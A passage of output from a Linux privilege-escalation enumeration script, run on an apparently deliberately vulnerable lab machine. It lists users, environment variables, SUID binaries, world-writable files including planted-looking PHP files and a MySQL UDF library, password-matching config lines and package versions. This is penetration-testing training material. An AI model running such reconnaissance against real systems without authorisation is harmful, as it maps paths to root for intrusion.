drwxr-xr-x 67 root root 4096 Nov 30 14:17 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rw-r--r-- 1 root root 492 Apr 17 2009 php5
/etc/cron.daily:
total 56
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 14:17 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 633 Jun 18 2009 apache2
-rwxr-xr-x 1 root root 8101 Apr 17 2009 apt
-rwxr-xr-x 1 root root 314 Apr 4 2008 aptitude
-rwxr-xr-x 1 root root 502 Dec 12 2007 bsdmainutils
-rwxr-xr-x 1 root root 89 Oct 9 2008 logrotate
-rwxr-xr-x 1 root root 954 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 183 Mar 8 2008 mlocate
-rwxr-xr-x 1 root root 383 Mar 9 2009 samba
-rwxr-xr-x 1 root root 3295 May 12 2009 standard
-rwxr-xr-x 1 root root 1309 Nov 23 2007 sysklogd
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 14:17 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
/etc/cron.monthly:
total 16
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 14:17 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 129 May 12 2009 standard
/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 14:17 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 528 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28 2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23 2007 sysklogd
[+] Writable cron dirs
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
14:56:56 up 2:31, 1 user, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
john pts/0 172.16.0.24 13:29 0.00s 1.09s 0.05s /usr/bin/python ./linuxprivchecker.py
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
[+] Current User ID
uid=1001(john) gid=1001(john) groups=1001(john)
[+] Super Users Found:
root
[+] Environment
LESSOPEN=| /usr/bin/lesspipe %s
USER=john
SSH_CLIENT=172.16.0.24 46824 22
MAIL=/var/mail/john
SHLVL=2
HOME=/home/john
OLDPWD=/var
SSH_TTY=/dev/pts/0
LC_MONETARY=pt_BR.UTF-8
LOGNAME=john
_=./linuxprivchecker.py
COLUMNS=169
TERM=xterm
HISTCONTROL=ignoreboth
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
LC_ADDRESS=pt_BR.UTF-8
LANG=en_US.UTF-8
LC_TELEPHONE=pt_BR.UTF-8
LC_NAME=pt_BR.UTF-8
SHELL=/bin/kshell
LESSCLOSE=/usr/bin/lesspipe %s %s
LC_MEASUREMENT=pt_BR.UTF-8
LC_IDENTIFICATION=pt_BR.UTF-8
PWD=/home/john
SSH_CONNECTION=172.16.0.24 46824 172.16.0.100 22
LINES=40
LC_NUMERIC=pt_BR.UTF-8
LC_PAPER=pt_BR.UTF-8
[+] Current User
john
[+] Root and current user history (depends on privs)
-rw------- 1 john john 61 Feb 4 2012 /home/john/.bash_history
-rw------- 1 john john 66 Nov 30 14:15 /home/john/.mysql_history
-rw------- 1 root root 59 Feb 6 2012 /root/.bash_history
-rw------- 1 root root 1 Feb 5 2012 /root/.mysql_history
-rw------- 1 root root 5 Feb 6 2012 /root/.nano_history
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 2 root root 4096 Mar 9 2009 /var/spool/samba
drwx-wx-wt 2 root root 4096 Nov 30 13:39 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 29 2009 /var/tmp
drwxrwxrwt 3 root root 60 Nov 30 12:25 /var/lock
drwxrwxrwt 2 root root 40 Nov 30 12:25 /dev/shm
drwxrwxrwt 3 root root 4096 Nov 30 13:43 /tmp
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
-rw-rw-rw- 1 root root 885 Nov 30 12:55 /var/www/tmpbymrg.php
-rw-rw-rw- 1 root root 719 Nov 30 12:55 /var/www/tmpurgaq.php
-rw-rw-rw- 1 root root 12896 Feb 4 2012 /usr/lib/lib_mysqludf_sys.so
[+] Checking if root's home folder is accessible
/root:
total 44K
drwxr-xr-x 4 root root 4.0K Feb 6 2012 .
drwxr-xr-x 21 root root 4.0K Feb 6 2012 ..
-rw------- 1 root root 59 Feb 6 2012 .bash_history
-rw-r--r-- 1 root root 2.2K Oct 20 2007 .bashrc
-rw-r--r-- 1 root root 1 Feb 5 2012 .lhistory
-rw------- 1 root root 1 Feb 5 2012 .mysql_history
-rw------- 1 root root 5 Feb 6 2012 .nano_history
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
drwx------ 2 root root 4.0K Feb 6 2012 .ssh
-rw-r--r-- 1 root root 625 Feb 6 2012 congrats.txt
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 lshell-0.9.12
/root/lshell-0.9.12:
total 108K
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 .
drwxr-xr-x 4 root root 4.0K Feb 6 2012 ..
-rwxr-xr-x 1 loneferret loneferret 8.7K May 4 2010 CHANGES
-rw-r--r-- 1 loneferret loneferret 35K Feb 7 2010 COPYING
-rw-r--r-- 1 loneferret loneferret 143 Mar 1 2010 MANIFEST.in
-rw-r--r-- 1 loneferret loneferret 879 May 4 2010 PKG-INFO
-rw-r--r-- 1 loneferret loneferret 8.3K Feb 7 2010 README
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 bin
drwxr-xr-x 4 root root 4.0K Feb 4 2012 build
drwxr-xr-x 3 loneferret loneferret 4.0K May 4 2010 etc
-rw-r--r-- 1 loneferret loneferret 3.4K May 4 2010 lshell.spec
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 lshellmodule
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 man
-rwxr-xr-x 1 loneferret loneferret 2.5K May 4 2010 setup.py
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 test
/root/lshell-0.9.12/bin:
total 12K
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
-rwxr-xr-x 1 loneferret loneferret 955 Feb 7 2010 lshell
/root/lshell-0.9.12/build:
total 16K
drwxr-xr-x 4 root root 4.0K Feb 4 2012 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
drwxr-xr-x 2 root root 4.0K Feb 4 2012 lib
drwxr-xr-x 2 root root 4.0K Feb 4 2012 scripts-2.5
/root/lshell-0.9.12/build/lib:
total 64K
drwxr-xr-x 2 root root 4.0K Feb 4 2012 .
drwxr-xr-x 4 root root 4.0K Feb 4 2012 ..
-rw-r--r-- 1 root root 50K May 4 2010 lshell.py
/root/lshell-0.9.12/build/scripts-2.5:
total 12K
drwxr-xr-x 2 root root 4.0K Feb 4 2012 .
drwxr-xr-x 4 root root 4.0K Feb 4 2012 ..
-rwxr-xr-x 1 root root 951 Feb 4 2012 lshell
/root/lshell-0.9.12/etc:
total 16K
drwxr-xr-x 3 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 logrotate.d
-rw-r--r-- 1 loneferret loneferret 2.4K Apr 17 2010 lshell.conf
/root/lshell-0.9.12/etc/logrotate.d:
total 12K
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 3 loneferret loneferret 4.0K May 4 2010 ..
-rw-r--r-- 1 loneferret loneferret 149 Mar 1 2010 lshell
/root/lshell-0.9.12/lshellmodule:
total 64K
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
-rwxr-xr-x 1 loneferret loneferret 50K May 4 2010 lshell.py
/root/lshell-0.9.12/man:
total 16K
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
-rw-r--r-- 1 loneferret loneferret 6.7K May 4 2010 lshell.1
/root/lshell-0.9.12/test:
total 16K
drwxr-xr-x 2 loneferret loneferret 4.0K May 4 2010 .
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 ..
-rwxr-xr-x 1 loneferret loneferret 7.8K Apr 17 2010 test_lshell.py
[+] SUID/SGID Files and Directories
drwxr-s--- 2 mysql adm 4096 Feb 4 2012 /var/log/mysql
drwxr-sr-x 2 news news 4096 Feb 4 2012 /var/log/news
drwxrwsr-x 2 root mail 4096 Feb 4 2012 /var/mail
drwxrwsr-x 2 libuuid libuuid 4096 Feb 4 2012 /var/lib/libuuid
drwxrwsr-x 2 root staff 4096 Jun 29 2009 /var/local
drwxr-sr-x 41 man root 4096 Feb 6 2012 /var/cache/man
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/es
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/de
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/ko
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/pl
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/opt
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat1
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/pl.UTF-8
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/tr
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/id
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/fi
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/ru.KOI8-R
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat6
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat7
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/ru
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/fr
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/it.UTF-8
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/hu
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat4
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/zh_CN
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cs
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/fr.ISO8859-1
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat5
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/it.ISO8859-1
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/ru.UTF-8
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/pl.ISO8859-2
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat3
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat2
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/X11R6
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/it
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/fsstnd
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/oldlocal
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/cat8
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/pt_BR
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/local
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/ja
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/fr.UTF-8
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/zh_TW
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/sv
drwxr-sr-x 2 man root 4096 Feb 6 2012 /var/cache/man/gl
drwxr-s--- 2 root dip 4096 Feb 4 2012 /etc/chatscripts
drwxr-s--- 2 root dip 4096 Feb 4 2012 /etc/ppp/peers
-rwsr-xr-- 1 root www-data 10276 Jun 18 2009 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4588 Aug 22 2008 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 168340 May 14 2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Sep 12 2008 /usr/lib/pt_chown
-rwxr-sr-x 1 root tty 9960 Sep 26 2008 /usr/bin/wall
-rwxr-sr-x 1 root shadow 16424 Dec 8 2008 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 26928 May 12 2009 /usr/bin/crontab
-rwsr-xr-x 1 root root 23952 Dec 8 2008 /usr/bin/chsh
-rwsr-xr-x 2 root root 107936 Feb 16 2009 /usr/bin/sudo
-rwxr-sr-x 1 root tty 8192 Dec 12 2007 /usr/bin/bsd-write
-rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 19144 Dec 8 2008 /usr/bin/newgrp
-rwxr-sr-x 1 root mlocate 30508 Mar 8 2008 /usr/bin/mlocate
-rwsr-xr-x 2 root root 107936 Feb 16 2009 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 28624 Dec 8 2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping
-rwsr-xr-x 1 root root 37360 Dec 8 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
-rwsr-xr-x 1 root root 29104 Dec 8 2008 /usr/bin/passwd
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwxr-sr-x 1 root shadow 37904 Dec 8 2008 /usr/bin/chage
-rwxr-sr-x 1 root ssh 76580 May 14 2008 /usr/bin/ssh-agent
-rwsr-xr-- 1 root dip 269256 Oct 4 2007 /usr/sbin/pppd
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
drwxrwsr-x 3 root staff 4096 Feb 4 2012 /usr/local/lib/python2.5
drwxrwsr-x 2 root staff 4096 Feb 4 2012 /usr/local/lib/python2.5/site-packages
drwxrwsr-x 2 root src 4096 Jun 29 2009 /usr/src
-rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 1 root root 81368 Sep 26 2008 /bin/mount
-rwsr-xr-x 1 root root 26684 Dec 10 2007 /bin/ping6
-rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Dec 8 2008 /bin/su
-rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping
-rwsr-xr-x 1 root root 63584 Sep 26 2008 /bin/umount
-rwsr-xr-x 1 root root 9260 Mar 9 2009 /sbin/umount.cifs
-rwxr-sr-x 1 root shadow 19584 May 16 2008 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 23340 Mar 9 2009 /sbin/mount.cifs
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
/etc/samba/smb.conf:# You may wish to use password encryption. See the section on
/etc/samba/smb.conf:# 'encrypt passwords' in the smb.conf(5) manpage before enabling.
/etc/samba/smb.conf: encrypt passwords = true
/etc/samba/smb.conf:# If you are using encrypted passwords, Samba will need to know what
/etc/samba/smb.conf:# password database type you are using.
/etc/samba/smb.conf:# password with the SMB password when the encrypted SMB password in the
/etc/samba/smb.conf: unix password sync = yes
/etc/samba/smb.conf:# For Unix password sync to work on a Debian GNU/Linux system, the following
/etc/samba/smb.conf: passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
/etc/samba/smb.conf:# This boolean controls whether PAM will be used for password changes
/etc/samba/smb.conf: pam password change = yes
/etc/samba/smb.conf:# password; please adapt to your needs
/etc/samba/smb.conf:; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
/etc/mysql/my.cnf:# It has been reported that passwords should be enclosed with ticks/quotes
/etc/mysql/conf.d/old_passwords.cnf:old_passwords = false
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# --user-master Select password to use
/etc/ltrace.conf:; pwd.h
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
Status=Not/Installed/Config-f/Unpacked/Failed-cfg/Half-inst/t-aWait/T-pend
Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err:
Name Version
adduser 3.105ubuntu1 and remove users and groups
apache2 2.2.8-1ubuntu0.9 generation, scalable, extendable web server
apache2-mpm-prefork 2.2.8-1ubuntu0.9 model for Apache HTTPD
apache2-utils 2.2.8-1ubuntu0.9 programs for webservers
apache2.2-common 2.2.8-1ubuntu0.9 generation, scalable, extendable web server
apparmor 2.1+1075-0ubuntu9.2 parser utility for AppArmor
apparmor-utils 2.1+1075-0ubuntu9.2 for controlling AppArmor
apt 0.7.9ubuntu17.2 front-end for dpkg
apt-utils 0.7.9ubuntu17.2 utility programs
aptitude 0.4.9-2ubuntu5 package manager
at 3.1.10ubuntu4 job execution and batch processing
base-files 4.0.1ubuntu5.8.04.7 base system miscellaneous files
base-passwd 3.5.16 base system master password and group files
bash 3.2-0ubuntu18 GNU Bourne Again SHell
bash-completion 20060301-3ubuntu3 completion for the bash shell
belocs-locales-bin 2.4-2.2ubuntu7 for compiling locale data files
bind9-host 1:9.4.2.dfsg.P2-2ubuntu0.1 of 'host' bundled with BIND 9.X
bsdmainutils 6.1.10ubuntu2 of more utilities from FreeBSD
bsdutils 1:2.13.1-5ubuntu3 utilities from 4.4BSD-Lite
busybox-initramfs 1:1.1.3-5ubuntu12 shell setup for initramfs
bzip2 1.0.4-2ubuntu4 block-sorting file compressor - utilities
command-not-found 0.2.17ubuntu1 installation of packages in interactive bash sessions
command-not-found-data 0.2.17ubuntu1 of data files for command-not-found.
console-setup 1.21ubuntu9 up the font and the keyboard on the console
console-terminus 4.20-6 fonts for fast reading on the Linux console
console-tools 1:0.2.3dbs-65ubuntu7 console and font utilities
coreutils 6.10-3ubuntu2 GNU core utilities
cpio 2.9-6ubuntu1 cpio -- a program to manage archives of files
cpp 4:4.2.3-1ubuntu6 GNU C preprocessor (cpp)
cpp-4.2 4.2.4-1ubuntu4 GNU C preprocessor
cron 3.0pl1-100ubuntu2.1 of regular background processing
dash 0.5.4-8ubuntu1.1 shell
debconf 1.5.20 configuration management system
debconf-i18n 1.5.20 internationalization support for debconf
debianutils 2.28.2-0ubuntu1 utilities specific to Debian
dhcp3-client 3.0.6.dfsg-1ubuntu9 client
dhcp3-common 3.0.6.dfsg-1ubuntu9 files used by all the dhcp3* packages
diff 2.8.1-12ubuntu1 comparison utilities
dmidecode 2.9-1ubuntu1 Desktop Management Interface data
dnsutils 1:9.4.2.dfsg.P2-2ubuntu0.1 provided with BIND
dosfstools 2.11-2.3ubuntu1 to create and check MS-DOS FAT filesystems
dpkg 1.14.16.6ubuntu4 maintenance system for Debian
e2fslibs 1.40.8-2ubuntu2 filesystem libraries
e2fsprogs 1.40.8-2ubuntu2 file system utilities and libraries
ed 0.7-1ubuntu1 classic unix line editor
eject 2.1.5-6ubuntu1 CDs and operates CD-Changers under Linux
ethtool 6-0 or change ethernet card settings
fdutils 5.5-20060227-1.1 floppy utilities
file 4.21-3ubuntu2 file type using "magic" numbers
findutils 4.2.32-1ubuntu2 for finding files--find, xargs
friendly-recovery 0.1.2 recovery more user-friendly
ftp 0.17-16build1 FTP client
fuse-utils 2.7.2-1ubuntu2 in USErspace (utilities)
gcc-4.2-base 4.2.4-1ubuntu4 GNU Compiler Collection (base package)
gettext-base 0.17-2ubuntu1 Internationalization utilities for the base system
gnupg 1.4.6-2ubuntu5 privacy guard - a free PGP replacement
gpgv 1.4.6-2ubuntu5 privacy guard - signature verification tool
grep 2.5.3~dfsg-3 grep, egrep and fgrep
groff-base 1.18.1.1-16 troff text-formatting system (base system components)
grub 0.97-29ubuntu21.2 Unified Bootloader
gzip 1.3.12-3.2 GNU compression utility
hdparm 8.6-1ubuntu1 hard disk parameters for high performance
hostname 2.94 to set/show the host name or domain name
ifupdown 0.6.8ubuntu8 level tools to configure network interfaces
info 4.11.dfsg.1-4 GNU Info documentation browser
initramfs-tools 0.85eubuntu39.3 for generating an initramfs
initscripts 2.86.ds1-14.1ubuntu45.1 for initializing and shutting down the system
inputattach 1.23-0ubuntu2 to attach serial devices to the input subsystem
installation-report 2.31ubuntu2 installation report
iproute 20071016-2ubuntu2 tools to control the networking in Linux kernels
iptables 1.3.8.0debian1-1ubuntu2 tools for packet filtering and NAT
iputils-arping 3:20071127-1 to send ICMP echo requests to an ARP address
iputils-ping 3:20071127-1 to test the reachability of network hosts
iputils-tracepath 3:20071127-1 to trace the network path to a remote host
klibc-utils 1.5.7-4ubuntu4 statically-linked utilities built with klibc
klogd 1.5-1ubuntu1 Logging Daemon
laptop-detect 0.13.2ubuntu1 to detect a laptop
less 418-1 program similar to more
libacl1 2.2.45-1 control list shared library
libapache2-mod-php5 5.2.4-2ubuntu5.6 HTML-embedded scripting language (apache 2 module)
libapr1 1.2.11-1 Apache Portable Runtime Library
libaprutil1 1.2.12+dfsg-3ubuntu0.1 Apache Portable Runtime Utility Library
libatm1 2.4.1-17.1build1 library for ATM (Asynchronous Transfer Mode)
libattr1 1:2.4.39-1 attribute shared library
libbind9-30 1:9.4.2.dfsg.P2-2ubuntu0.1 Shared Library used by BIND
libblkid1 1.40.8-2ubuntu2 device id library
libbz2-1.0 1.0.4-2ubuntu4 block-sorting file compressor library - runtime
libc6 2.7-10ubuntu4 C Library: Shared libraries
libc6-i686 2.7-10ubuntu4 C Library: Shared libraries [i686 optimized]
libcap1 1:1.10-14build1 for getting/setting POSIX.1e capabilities
libck-connector0 0.2.3-3ubuntu5 libraries
libcomerr2 1.40.8-2ubuntu2 error description library
libconsole 1:0.2.3dbs-65ubuntu7 libraries for Linux console and font manipulation
libcupsys2 1.3.7-1ubuntu3.5 UNIX Printing System(tm) - libs
libcurl3-gnutls 7.18.0-1ubuntu2.1 file transfer library (GnuTLS)
libcwidget3 0.5.8-1ubuntu1 terminal interface library for C++ (runtime files)
libdb4.6 4.6.21-6ubuntu1 v4.6 Database Libraries [runtime]
libdbd-mysql-perl 4.005-1 Perl5 database interface to the MySQL database
libdbi-perl 1.601-1 database interface by Tim Bunce
libdbus-1-3 1.1.20-1ubuntu3.2 interprocess messaging system
libdevmapper1.02.1 2:1.02.20-2ubuntu2 Linux Kernel Device Mapper userspace library
libdns35 1:9.4.2.dfsg.P2-2ubuntu0.1 Shared Library used by BIND
libedit2 2.9.cvs.20050518-4 editline and history libraries
libelfg0 0.8.6-4 ELF object file access library
libexpat1 2.0.1-0ubuntu1 parsing C library - runtime library
libfribidi0 0.10.9-1 Implementation of the Unicode BiDi algorithm
libfuse2 2.7.2-1ubuntu2 in USErspace library
libgc1c2 1:6.8-1.1 garbage collector for C and C++
libgcc1 1:4.2.4-1ubuntu4 support library
libgcrypt11 1.2.4-2ubuntu7 Crypto library - runtime library
libgdbm3 1.8.3-3 dbm database routines (runtime version)
libgnutls13 2.0.4-1ubuntu2.5 GNU TLS library - runtime library
libgpg-error0 1.4-2ubuntu7 for common error values and messages in GnuPG components
libgpmg1 1.19.6-25ubuntu1 Purpose Mouse - shared library
libhtml-parser-perl 3.56-1 collection of modules that parse HTML text documents
libhtml-tagset-perl 3.10-2 tables pertaining to HTML
libhtml-tree-perl 3.23-1 and create HTML syntax trees
libidn11 1.1-1 libidn library, implementation of IETF IDN specifications
libisc35 1:9.4.2.dfsg.P2-2ubuntu0.1 Shared Library used by BIND
libisccc30 1:9.4.2.dfsg.P2-2ubuntu0.1 Channel Library used by BIND
libisccfg30 1:9.4.2.dfsg.P2-2ubuntu0.1 File Handling Library used by BIND
libiw29 29-1ubuntu2 tools - library
libkeyutils1 1.2-4 Key Management Utilities (library)
libklibc 1.5.7-4ubuntu4 libc subset for use with initramfs
libkrb53 1.6.dfsg.3~beta1-2ubuntu1.1 Kerberos runtime libraries
libldap-2.4-2 2.4.9-0ubuntu0.8.04.3 libraries
liblocale-gettext-perl 1.05-2ubuntu1 libc functions for internationalization in Perl
liblwres30 1:9.4.2.dfsg.P2-2ubuntu0.1 Resolver Library used by BIND
liblzo2-2 2.02-3 compression library
libmagic1 4.21-3ubuntu2 type determination library using "magic" numbers
libmysqlclient15off 5.0.51a-3ubuntu5.4 database client library
libncurses5 5.6+20071124-1ubuntu2 libraries for terminal handling
libncursesw5 5.6+20071124-1ubuntu2 libraries for terminal handling (wide character support)
libnet-daemon-perl 0.38-1.1 module for building portable Perl daemons easily.
libnewt0.52 0.52.2-11.2ubuntu1 Erik's Windowing Toolkit - text mode windowing with slang
libntfs-3g23 1:1.2216-1ubuntu3 filesystem in userspace (FUSE) library
libopencdk10 0.6.6-1ubuntu1 Crypto Development Kit (OpenCDK) (runtime)
libpam-modules 0.99.7.1-5ubuntu6.1 Authentication Modules for PAM
libpam-runtime 0.99.7.1-5ubuntu6.1 support for the PAM library
libpam-smbpass 3.0.28a-1ubuntu4.8 authentication module for SMB/CIFS password database
libpam0g 0.99.7.1-5ubuntu6.1 Authentication Modules library
libparted1.7-1 1.7.1-5.1ubuntu9.2 GNU Parted disk partitioning shared library
libpcap0.8 0.9.8-2 interface for user-level packet capture
libpcre3 7.4-1ubuntu2.1 5 Compatible Regular Expression Library - runtime files
libplrpc-perl 0.2017-1.1 extensions for writing PlRPC servers and clients
libpopt0 1.10-3build1 for parsing cmdline parameters
libpq5 8.3.7-0ubuntu8.04.1 C client library
libreadline5 5.2-3build1 readline and history libraries, run-time libraries
librpc-xml-perl 0.59-2 module implementation of XML-RPC
libsasl2-2 2.1.22.dfsg1-18ubuntu2.1 SASL - authentication abstraction library
libsasl2-modules 2.1.22.dfsg1-18ubuntu2.1 SASL - pluggable authentication modules
libselinux1 2.0.55-0ubuntu4 policy enforcement, run-time libraries
libsepol1 2.0.20-0ubuntu3 binary policy, run-time library
libsigc++-2.0-0c2a 2.0.17-2ubuntu3 Signal Framework for C++ - runtime
libslang2 2.1.3-2 S-Lang programming library - runtime version
libsqlite3-0 3.4.2-2 3 shared library
libss2 1.40.8-2ubuntu2 interface parsing library
libssl0.9.8 0.9.8g-4ubuntu3.7 shared libraries
libstdc++6 4.2.4-1ubuntu4 GNU Standard C++ Library v3
libsysfs2 2.1.0-4 library to sysfs
libtasn1-3 1.1-1 ASN.1 structures (runtime)
libterm-readkey-perl 2.30-3ubuntu1 perl module for simple terminal control
libtext-charwidth-perl 0.04-4build1 display widths of characters on the terminal
libtext-iconv-perl 1.4-3 between character sets in Perl
libtext-wrapi18n-perl 0.06-5 substitute of Text::Wrap
liburi-perl 1.35.dfsg.1-1 and accesses URI strings
libusb-0.1-4 2:0.1.12-8 USB programming library
libuuid1 1.40.8-2ubuntu2 unique id library
libvolume-id0 117-8ubuntu0.2 identification library
libwrap0 7.6.dbs-14 Venema's TCP wrappers library
libwww-perl 5.808-1 client/server library for Perl (aka LWP)
libxml-parser-perl 2.34-4.3 module for parsing XML files
